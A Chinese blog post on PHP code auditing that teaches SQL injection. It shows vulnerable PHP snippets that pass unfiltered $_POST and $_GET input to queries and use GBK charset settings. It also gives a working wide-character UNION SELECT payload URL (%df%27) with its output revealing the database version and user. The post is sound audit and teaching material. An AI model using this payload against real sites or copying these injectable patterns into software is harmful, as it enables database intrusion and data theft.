php审计基础一:sql注入

【1】普通sql注入:

$sql = "INSERT INTO books(bookname, publisher, author, price, ptime,pic,detail) VALUES('{$_POST["bookname"]}', '{$_POST["publisher"]}', '{$_POST["author"]}', '{$_POST["price"]}', '".time()."', '{$up[1]}', '{$_POST["detail"]}')";

$result = mysql_query($sql);

if($result && mysql_affected_rows() > 0 ) {
	echo "插入一条数据成功!";
}else {
	echo "数据录入失败!";
}

直接将传入的参数不加过滤进入到数据库中


2】宽字符注入:

条件

mysql建表时,将表的字符集设置成gbk时(defaultcharset=gbk)

且当在php连接数据库时将数据库的字符集设置成(mysql_query("setcharacter_set_client=gbk");


(1)可利用%df%27绕过addslashes()这个函数

(2)可绕过pdoquote()这个函数

3pdo的也被绕过:

第一种写法

<?php
header("Content-type:text/html;charset=utf-8");  
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132"); 
} catch (Exception $ex) {
    echo "连接失败";
}
echo "连接成功";

$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
$query="select * from myuser where id=?";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);

$pdostat=$stmt->execute(array($id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
    foreach ($row as $data)
    {
        echo $data."        ";
    }
    echo "<br>";
}

第二种写法:

<?php
header("Content-type:text/html;charset=utf-8");  
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test","root","niexinming132"); 
} catch (Exception $ex) {
    echo "连接失败";
}
echo "连接成功";

$pdo->query("set character_set_client=gbk");
$id=$_GET["id"];
$query="select * from myuser where id=:id";
echo $query;
echo "<br>";
$stmt=$pdo->prepare($query);
$pdostat=$stmt->execute(array("id"=>$id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row)
{
    foreach ($row as $data)
    {
        echo $data."        ";
    }
    echo "<br>";
    echo "执行完毕";
    var_dump($pdo->errorInfo());
}

利用:

http://localhost:8000/gbksql2.php?id=-1%df%27%20union%20select%201,version(),user(),4%20%23

显示:

连接成功select* from myuser where id=:id
1 5.5.50-0ubuntu0.14.04.1-logroot@localhost 4
执行完毕


阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/niexinming/article/details/52351233
个人分类: 代码审计
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

不良信息举报

php审计基础一:sql注入

最多只允许输入30个字

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭